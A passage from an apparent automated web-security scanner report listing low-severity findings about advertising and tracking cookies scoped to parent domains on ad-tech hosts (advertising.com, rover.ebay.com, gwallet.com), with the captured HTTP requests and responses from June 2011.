Set-Cookie: C2=YFf+NFJwHob0Fz7sIWwJoa8ntKfBC0nxfKpwEg02FkNBdbdBZTwihXQ2EwjmGkNBxGeBZTAQvaQ2EQW4FkNBLppBZTQghXQ2EgN5FkNB6ijBZTAmhXQ2EAY4FkNBdDmBZTA/yaQ2EAVZGkNBYimBZTA3WaQ2EQY4FkNBFGeBZTAxBaQ2EU1aGkNBbTeBZTQwBaQ2EYnXGkNBWGoBZTgQvaQ2EogmGkNBxmpBZTQRgaQ2E0soGkNB8mpBZDrnA8ekGyQkBAAoNXMDmZOiGeKtyBw2saIDNSPC73cBw1KaAwzgGevr5Dwxaa49CQ4kGRtt4Kgq4aIDzamAjSqRUPLUCsEpGRdpFDw09Y8FvCBB3hoxYC; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
Set-Cookie: F1=BgV853EBAAAABAAAAIAAcEA; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
Set-Cookie: BASE=x7Q9Pi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0B!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
Set-Cookie: ROLL=U6APAje2RKFWN9uaB4l2AhB!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
Set-Cookie: 76077167=_4df9f158,6884555565,804480^956559^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804480/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=BTg+NFJwHob0Fj7sIWwJoa8mtKPCC0nBtJpwEg02FUNBdbdBVTwihXQ1EwjmGUNBxGeBVTAQvaQ1EQW4FUNBLppBVTQghXQ1EgN5FUNB6ijBVTAmhXQ1EAY4FUNBdDmBVTA/yaQ1EAVZGUNBYimBVTA3WaQ1EQY4FUNBFGeBVTAxBaQ1EU1aGUNBbTeBVTQwBaQ1EYnXGUNBWGoBVTgQvaQ1EogmGUNBxmpBVTQRgaQ1E0soGUNB8mpBVDrnA8ekGiQkBAAoNXMCmZOiGgKtyBw2saICNSPC73cBw1KaAwzgGOvr5Dwxaa48CQ4kGBtt4Kgq4aICzamAjSqRQPLUCsEpGBdpFDw09Y8EvCBB3hoxUC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
F1=BEMB63EBAAAABAAAAQAA8DA; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
ROLL=U6APGje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
22657113=_4dfa04c1,6476384225,804481^894875^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308230849079&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; F1=BUj953EBAAAABAAAAMAAUEA; BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; ROLL=U6APBje2RKFWN9uaB4l2AhxSqVDmeNF!; C2=3Yf+NFJwHob0Fv7sIWwJoasntKPCC0nBwJpwEg02FgNBdbdBYTwihXA2EwjmGgNBxGeBYTAQvaA2EQW4FgNBLppBYTQghXA2EgN5FgNB6ijBYTAmhXA2EAY4FgNBdDmBYTA/yaA2EAVZGgNBYimBYTA3WaA2EQY4FgNBFGeBYTAxBaA2EU1aGgNBbTeBYTQwBaA2EYnXGgNBWGoBYTgQvaA2EogmGgNBxmpBYTQRgaA2E0soGgNB8mpBYDrnA8ekGuQkBAAoNX8CmZOiGaKtyBw2sa4CNSPC73cBw1KaAwzgGavr5Dwxaao9CQ4kGNtt4Kgq4a4CzamAjSqRTPLUCsEpGNdpFDw09YsFvCBB3hoxXC; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.804481.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 13:27:28 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 13:27:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=BTg+NFJwHob0Fj7sIWwJoa8mtKPCC0nBtJpwEg02FUNBdbdBVTwihXQ1EwjmGUNBxGeBVTAQvaQ1EQW4FUNBLppBVTQghXQ1EgN5FUNB6ijBVTAmhXQ1EAY4FUNBdDmBVTA/yaQ1EAVZGUNBYimBVTA3WaQ1EQY4FUNBFGeBVTAxBaQ1EU1aGUNBbTeBVTQwBaQ1EYnXGUNBWGoBVTgQvaQ1EogmGUNBxmpBVTQRgaQ1E0soGUNB8mpBVDrnA8ekGiQkBAAoNXMCmZOiGgKtyBw2saICNSPC73cBw1KaAwzgGOvr5Dwxaa48CQ4kGBtt4Kgq4aICzamAjSqRQPLUCsEpGBdpFDw09Y8EvCBB3hoxUC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
Set-Cookie: F1=BEMB63EBAAAABAAAAQAA8DA; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
Set-Cookie: BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
Set-Cookie: ROLL=U6APGje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
Set-Cookie: 22657113=_4dfa04c1,6476384225,804481^894875^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804481/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=Xmg+NFJwHob0Ff7sIWwJoasmtKPCC0nBsJpwEg02FQNBdbdBUTwihXA1EwjmGQNBxGeBUTAQvaA1EQW4FQNBLppBUTQghXA1EgN5FQNB6ijBUTAmhXA1EAY4FQNBdDmBUTA/yaA1EAVZGQNBYimBUTA3WaA1EQY4FQNBFGeBUTAxBaA1EU1aGQNBbTeBUTQwBaA1EYnXGQNBWGoBUTgQvaA1EogmGQNBxmpBUTQRgaA1E0soGQNB8mpBUDrnA8ekGeQkBAAoNX8BmZOiGcKtyBw2sa4BNSPC73cBw1KaAwzgGKvr5Dwxaao8CQ4kG9st4Kgq4a4BzamAjSqRPPLUCsEpG9cpFDw09YsEvCBB3hoxTC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
F1=BcZC63EBAAAABAAAAUAA0DA; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHBGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
ROLL=U6APHje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJMf0r/dZP!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
91341378=_4dfa0997,2744854335,804481^956561^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308232087402&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=BTg+NFJwHob0Fj7sIWwJoa8mtKPCC0nBtJpwEg02FUNBdbdBVTwihXQ1EwjmGUNBxGeBVTAQvaQ1EQW4FUNBLppBVTQghXQ1EgN5FUNB6ijBVTAmhXQ1EAY4FUNBdDmBVTA/yaQ1EAVZGUNBYimBVTA3WaQ1EQY4FUNBFGeBVTAxBaQ1EU1aGUNBbTeBVTQwBaQ1EYnXGUNBWGoBVTgQvaQ1EogmGUNBxmpBVTQRgaQ1E0soGUNB8mpBVDrnA8ekGiQkBAAoNXMCmZOiGgKtyBw2saICNSPC73cBw1KaAwzgGOvr5Dwxaa48CQ4kGBtt4Kgq4aICzamAjSqRQPLUCsEpGBdpFDw09Y8EvCBB3hoxUC; F1=BEMB63EBAAAABAAAAQAA8DA; BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; ROLL=U6APGje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJ!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.804481.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 13:48:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 13:48:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Xmg+NFJwHob0Ff7sIWwJoasmtKPCC0nBsJpwEg02FQNBdbdBUTwihXA1EwjmGQNBxGeBUTAQvaA1EQW4FQNBLppBUTQghXA1EgN5FQNB6ijBUTAmhXA1EAY4FQNBdDmBUTA/yaA1EAVZGQNBYimBUTA3WaA1EQY4FQNBFGeBUTAxBaA1EU1aGQNBbTeBUTQwBaA1EYnXGQNBWGoBUTgQvaA1EogmGQNBxmpBUTQRgaA1E0soGQNB8mpBUDrnA8ekGeQkBAAoNX8BmZOiGcKtyBw2sa4BNSPC73cBw1KaAwzgGKvr5Dwxaao8CQ4kG9st4Kgq4a4BzamAjSqRPPLUCsEpG9cpFDw09YsEvCBB3hoxTC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
Set-Cookie: F1=BcZC63EBAAAABAAAAUAA0DA; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
Set-Cookie: BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHBGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
Set-Cookie: ROLL=U6APHje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJMf0r/dZP!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
Set-Cookie: 91341378=_4dfa0997,2744854335,804481^956561^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804481/mnum=0000956
...[SNIP]...

10.262. http://rover.ebay.com/ar/1/76417/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/ar/1/76417/4

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

npii=btrm/svid%3D943168581484fdb7c20^cguid/3666b2e01300a47a44d622a6ffc193724fdb7c20^; Domain=.ebay.com; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ar/1/76417/4?mpt=1308248221&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&imp_id=425067938274493911&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=728x90&adid=328092&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA./cnd=!3AQEKQj4uwIQoJ0UGIf5AiAD/referrer=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F728x90%252Fatf%253Ft%253D1308248219121%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860/clickenc=http%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768034%252Fmnum%253D0001004441%252Fcstr%253D27582677%253D_4dfa489d%252C2306156771%252C768034%255E1004441%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D27582677%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248219121&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btrm/svid%3D943168581484fc23203^cguid/3666b2e01300a47a44d622a6ffc193724fc23203^

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9un*ts67.c513g12-13099abb457
Set-Cookie: npii=btrm/svid%3D943168581484fdb7c20^cguid/3666b2e01300a47a44d622a6ffc193724fdb7c20^; Domain=.ebay.com; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private
Pragma: no-cache
Location: http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-0%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768034%26Perf_Tracker_2%3D0001004441%26Perf_Tracker_3%3D1183%26adid%3D328092%26imp_id%3D425067938274493911%26fcid%3D328082%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fdb7c1f%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240968314549%26imp_rvr_id%3D240968314549&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fdb7c1f&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240968314549&imp_rvr_id=240968314549&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA.%2Fcnd%3D%213AQEKQj4uwIQoJ0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F728x90%252Fatf%253Ft%253D1308248219121%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768034%252Fmnum%253D0001004441%252Fcstr%253D27582677%253D_4dfa489d%252C2306156771%252C768034%255E1004441%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D27582677%252Foptn%253D64%253Ftrg%253D
Content-Length: 0
Date: Thu, 16 Jun 2011 18:17:04 GMT

10.263. http://rover.ebay.com/ar/1/76418/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/ar/1/76418/4

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

npii=btrm/svid%3D943168581484fdb7c20^cguid/3666b2e01300a47a44d622a6ffc193724fdb7c20^; Domain=.ebay.com; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ar/1/76418/4?mpt=1308248221&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&imp_id=2884646768651692769&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=328072&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA./cnd=!6gSCKQj4uwIQrp0UGIf5AiAD/referrer=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860/clickenc=http%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248220548&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btrm/svid%3D943168581484fc23203^cguid/3666b2e01300a47a44d622a6ffc193724fc23203^

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9un*ts67.00466ba-13099abb221
Set-Cookie: npii=btrm/svid%3D943168581484fdb7c20^cguid/3666b2e01300a47a44d622a6ffc193724fdb7c20^; Domain=.ebay.com; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private
Pragma: no-cache
Location: http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-1%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768033%26Perf_Tracker_2%3D0001004438%26Perf_Tracker_3%3D1183%26adid%3D328072%26imp_id%3D2884646768651692769%26fcid%3D328062%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fdb7c1f%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240956791640%26imp_rvr_id%3D240956791640&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fdb7c1f&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240956791640&imp_rvr_id=240956791640&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA.%2Fcnd%3D%216gSCKQj4uwIQrp0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253D
Content-Length: 0
Date: Thu, 16 Jun 2011 18:17:03 GMT

10.264. http://rp.gwallet.com/r1/ucm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rp.gwallet.com
Path:	/r1/ucm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Fri, 15-Jun-2012 13:09:08 GMT; Path=/; Domain=gwallet.com; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/ucm?id=20FD010A38F6F94D332A46B302E11603&unknown=1&&r1s=39mX1hCcpX9kRfgYkyHke1uC5ZqNEW5PCmtFm5QZEQU HTTP/1.1
Host: rp.gwallet.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x113?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=17&admeld_callback=http://tag.admeld.com/pixel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ra1_uid=4626038992661376064; ra1_sgm=O4-e5X0-I3X0; ra1_sid=3

Response

HTTP/1.1 200 OK
Content-Length: 43
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: image/gif
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Fri, 15-Jun-2012 13:09:08 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=19; Expires=Fri, 15-Jun-2012 13:09:08 GMT; Path=/; Domain=gwallet.com; Version=1

GIF89a.............!.......,...........D..;

10.265. http://rs.gwallet.com/r1/pixel/x113 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x113

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Fri, 15-Jun-2012 13:08:50 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=O4-e5X0-I3X0; Expires=Fri, 15-Jun-2012 13:08:50 GMT; Path=/; Domain=gwallet.com; Version=1

